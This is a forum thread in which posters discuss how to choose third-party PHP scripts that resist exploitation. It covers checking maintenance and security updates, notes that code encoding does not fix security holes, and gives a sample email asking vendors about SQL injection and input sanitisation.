Websites get hacked; people are malicious. So how does one avoid script exploitation?

You could always write your own code, test it, try to exploit it, do some research on how others exploit code, test again. However, this takes time and it may be more feasible to use code created by someone else. When deciding to use someone elses code, do some research. Is the code being actively developed? Is there a forum for discussing the code? When was the last security update released? How often are security updates released? When you finally decide upon a specific piece of code to use, join all forums and mailing lists that the code maintainers have, so that if a security issue arises, you will know about it and can act accordingly.

I hear you...
doing some research. Has anyone ever used a php encoding software to protect their code? I am considering buying a package.. Then if what I am reading is correct I can use others code and not have to worry about security threats.

PHP encoding will stop people stealing your code, sure, but it won't fix security holes.

What you need is to buy code from people who you can trust absolutely. Trust is the name of the game here. Or pay someone to investigate it.

Send the following email to any potential script's owners:

Dear Sir or Madam,

I am considering purchasing $scriptname for use on my website, and have a few security-related questions for you:-

Have you had any reports about security flaws which are not yet resolved?
How have you protected yourself against SQL injection?
Does your script function perfectly with register_globals = off?
Have you sanitised all external data inputs?

Get the answers to these. If they seem good then use the script. If you have an SQL injection or unsanitised data based attack then phone your lawyer - you have, in writing, their assurance that these have been covered.